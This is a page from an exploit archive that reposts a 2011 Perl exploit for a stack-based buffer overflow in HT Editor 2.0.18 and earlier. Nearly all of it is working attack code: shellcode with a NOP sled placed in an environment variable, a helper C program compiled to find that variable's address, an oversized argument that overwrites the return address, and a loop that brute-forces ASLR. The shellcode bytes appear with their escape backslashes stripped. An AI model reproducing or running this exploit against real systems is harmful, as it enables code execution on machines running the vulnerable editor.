Home / exploits HT Editor 2.0.18 Stack Overflow
Posted on 31 March 2011
# Exploit Title: HT Editor File openning Stack Overflow (0day) # Date: March 30th 2011 # Author: ZadYree # Software Link: http://hte.sourceforge.net/downloads.html # Version: <= 2.0.18 # Tested on: Linux/Windows (buffer padding may differ on W32) # CVE : None #!/usr/bin/perl =head1 TITLE HT Editor <=2.0.18 0day Stack-Based Overflow Exploit =head2 SYNOPSIS my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; =head1 DESCRIPTION The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip. =head2 AUTHOR ZadYree ~ 3LRVS Team =head3 SEE ALSO ZadYree's blog: z4d.tuxfamily.org 3LRVS blog: 3lrvs.tuxfamily.org Shellcode based on http://www.shell-storm.org/shellcode/files/shellcode-606.php => Thanks =cut use strict; use warnings; use constant SHELLCODE => "xebx11x5ex31xc9xb1x21x80x6cx0e". "xffx01x80xe9x01x75xf6xebx05xe8" . "xeaxffxffxffx6bx0cx59x9ax53x67" . "x69x2ex71x8axe2x53x6bx69x69x30" . "x63x62x74x69x30x63x6ax6fx8axe4" . "x53x52x54x8axe2xcex81"; use constant NOPZ => ("x90" x 3000); $ENV{'TAPZCODE'} = (NOPZ . SHELLCODE); open(my $fh, ">", "g3tenv.c"); print $fh <<"EOF"; #include <stdio.h> void main() { printf("%x", getenv("TAPZCODE")); } EOF system("gcc g3tenv.c -o g3tenv"); my $retaddr = qx{./g3tenv}; my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; open(my $as, "<", "/proc/sys/kernel/randomize_va_space"); my $status = <$as>; close($as); unless ($status != 0) { unlink("g3tenv.c", "g3tenv"); exec(@$payload); } print "[*]ASLR detected!�12"; print "[*]Bruteforcing ASLR...�12"; while (1) { $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; qx{@$payload}; last unless ($? == 11); } unlink("g3tenv.c", "g3tenv"); die "HAPPY Hacking!";
